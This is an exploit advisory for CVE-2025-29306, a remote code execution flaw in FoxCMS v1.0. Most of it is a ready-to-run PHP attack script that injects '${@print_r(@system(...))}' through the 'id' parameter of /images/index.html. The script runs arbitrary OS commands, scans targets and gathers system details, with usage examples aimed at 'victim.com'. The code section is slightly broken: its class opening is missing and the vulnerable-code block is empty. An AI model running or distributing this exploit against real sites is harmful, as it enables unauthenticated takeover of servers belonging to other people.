============================================================================================================================================= | # Title : FoxCMS v1.0 PHP code injection | | # Author : indoushka | | # Tested on : Windows 11 Fr(Pro) / browser : Mozilla Firefox 145.0.1 (64 bits) | | # Vendor : https://sourceforge.net/projects/fox-cms/ | ============================================================================================================================================= POC : [+] References : https://packetstorm.news/files/id/190551/ & CVE-2025-29306 [+] Summary : A critical remote code execution vulnerability exists in FoxCMS v1.0 that allows unauthenticated attackers to execute arbitrary operating system commands via the 'id' parameter of the /images/index.html endpoint. The vulnerability stems from improper input sanitization and direct code evaluation. The vulnerability exists in the FoxCMS v1.0 /images/index.html endpoint, where user-supplied input in the 'id' parameter is directly evaluated without proper sanitization. The system fails to validate and sanitize user input, allowing attackers to inject and execute arbitrary PHP code. [+] Vulnerable Code Pattern: ```php // In /images/index.html or related component ``` [+] Usage: php exploit.php https://victim.com "id" [+] POC : colors = [ 'RED' => "\033[91m", 'GREEN' => "\033[92m", 'YELLOW' => "\033[93m", 'BLUE' => "\033[94m", 'MAGENTA' => "\033[95m", 'CYAN' => "\033[96m", 'WHITE' => "\033[97m", 'BOLD' => "\033[1m", 'RESET' => "\033[0m" ]; } private function color($text, $color) { return $this->colors[$color] . $text . $this->colors['RESET']; } private function showBanner() { $banner = $this->color(" ", 'CYAN') . $this->color(" ", 'MAGENTA') . $this->color("\n CVE-2025-29306 - FoxCMS v1.0 RCE Exploit\n", 'RED') . 
$this->color(" @indoushka\n\n", 'WHITE'); echo $banner; } private function makeRequest($url) { $context = stream_context_create([ 'http' => [ 'timeout' => 10, 'ignore_errors' => true, 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false ] ]); $response = @file_get_contents($url, false, $context); if ($response === false) { return ['success' => false, 'error' => 'Request failed']; } return ['success' => true, 'content' => $response]; } private function extractCommandOutput($html) { // Try multiple extraction methods $output = ''; // Method 1: Simple tag stripping $cleaned = strip_tags($html); // Method 2: Look for command output patterns if (preg_match('/]*>(.*?)<\/ul>/si', $html, $matches)) { $output = strip_tags($matches[1]); } // Method 3: Extract between common output markers if (preg_match('/\b(root|bin|daemon|system)\b/i', $cleaned)) { $output = $cleaned; } // Clean up the output $output = preg_replace('/\s+/', ' ', $output); $output = trim($output); return $output ?: $cleaned; } public function execute($target, $command) { $this->showBanner(); echo $this->color("[*] Target: ", 'BLUE') . $target . "\n"; echo $this->color("[*] Command: ", 'BLUE') . $command . "\n\n"; // Construct the exploit URL $payload = '${@print_r(@system("' . $command . '"))}'; $encodedPayload = urlencode($payload); $exploitUrl = rtrim($target, '/') . '/images/index.html?id=' . $encodedPayload; echo $this->color("[*] Sending RCE payload...", 'YELLOW') . "\n"; echo $this->color("[*] Exploit URL: ", 'CYAN') . $exploitUrl . "\n\n"; $response = $this->makeRequest($exploitUrl); if (!$response['success']) { echo $this->color("[!] Request failed: " . $response['error'], 'RED') . "\n"; return; } $output = $this->extractCommandOutput($response['content']); if (empty(trim($output))) { echo $this->color("[!] No command output received", 'RED') . "\n"; echo $this->color("[*] Response preview:", 'YELLOW') . 
"\n"; echo substr($response['content'], 0, 500) . "\n\n"; } else { echo $this->color("[+] Command output:", 'GREEN') . "\n"; echo $this->color(str_repeat("=", 60), 'CYAN') . "\n"; echo $output . "\n"; echo $this->color(str_repeat("=", 60), 'CYAN') . "\n"; } // Test additional commands for verification $this->testAdditionalCommands($target); } private function testAdditionalCommands($target) { echo $this->color("\n[*] Testing additional verification commands...", 'YELLOW') . "\n"; $testCommands = [ 'whoami' => 'Current user', 'pwd' => 'Current directory', 'uname -a' => 'System information' ]; foreach ($testCommands as $cmd => $description) { $payload = '${@print_r(@system("' . $cmd . '"))}'; $encodedPayload = urlencode($payload); $testUrl = rtrim($target, '/') . '/images/index.html?id=' . $encodedPayload; $response = $this->makeRequest($testUrl); if ($response['success']) { $output = $this->extractCommandOutput($response['content']); if (!empty(trim($output))) { echo $this->color("[+] $description: ", 'GREEN') . trim($output) . "\n"; } } } } public function scan($target) { $this->showBanner(); echo $this->color("[*] Scanning target for FoxCMS vulnerability: ", 'BLUE') . $target . "\n\n"; $testUrl = rtrim($target, '/') . '/images/index.html'; // First check if endpoint exists echo $this->color("[*] Checking if /images/index.html exists...", 'YELLOW') . "\n"; $response = $this->makeRequest($testUrl); if (!$response['success']) { echo $this->color("[-] Endpoint not accessible", 'RED') . "\n"; return false; } echo $this->color("[+] Endpoint is accessible", 'GREEN') . "\n"; // Test with simple command $testCommand = 'echo "VULNERABLE"'; $payload = '${@print_r(@system("' . $testCommand . '"))}'; $encodedPayload = urlencode($payload); $exploitUrl = $testUrl . '?id=' . $encodedPayload; echo $this->color("[*] Testing for RCE vulnerability...", 'YELLOW') . 
"\n"; $response = $this->makeRequest($exploitUrl); if ($response['success'] && strpos($response['content'], 'VULNERABLE') !== false) { echo $this->color("[+] Target is VULNERABLE to CVE-2025-29306!", 'RED') . "\n"; return true; } else { echo $this->color("[-] Target does not appear to be vulnerable", 'GREEN') . "\n"; return false; } } } // Main execution if (php_sapi_name() === 'cli') { if ($argc < 2) { echo "CVE-2025-29306 - FoxCMS v1.0 RCE Exploit\n"; echo "Usage:\n"; echo " php exploit.php [command]\n"; echo " php exploit.php --scan\n"; echo "\nExamples:\n"; echo " php exploit.php https://victim.com \"id\"\n"; echo " php exploit.php https://victim.com \"ls -la\"\n"; echo " php exploit.php https://victim.com --scan\n"; echo "\nDescription:\n"; echo " Exploits RCE vulnerability in FoxCMS v1.0 via /images/index.html id parameter\n"; exit(1); } $target = $argv[1]; $command = $argv[2] ?? '--scan'; if (!filter_var($target, FILTER_VALIDATE_URL)) { echo "Error: Invalid target URL\n"; exit(1); } $exploit = new FoxCMSExploit(); if ($command === '--scan') { $exploit->scan($target); } else { $exploit->execute($target, $command); } } else { echo "This script is intended for command line use only.\n"; } ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================